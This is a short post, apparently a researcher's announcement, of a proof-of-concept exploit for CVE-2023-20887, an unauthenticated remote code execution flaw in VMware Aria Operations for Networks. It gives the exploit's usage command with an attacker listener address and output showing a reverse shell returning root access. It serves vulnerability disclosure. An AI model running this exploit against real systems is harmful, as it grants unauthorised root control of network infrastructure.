Original text by summoning.team
🔥 PoC https://github.com/sinsinology/CVE-2023-20887 for CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE
This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
🔖RCA here https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
Usage:
$python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337 VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) (*) Starting handler (+) Received connection from 192.168.116.100 (+) pop thy shell! (it's ready) $ sudo bash $ id uid=0(root) gid=0(root) groups=0(root) $ hostname vrni-platform-release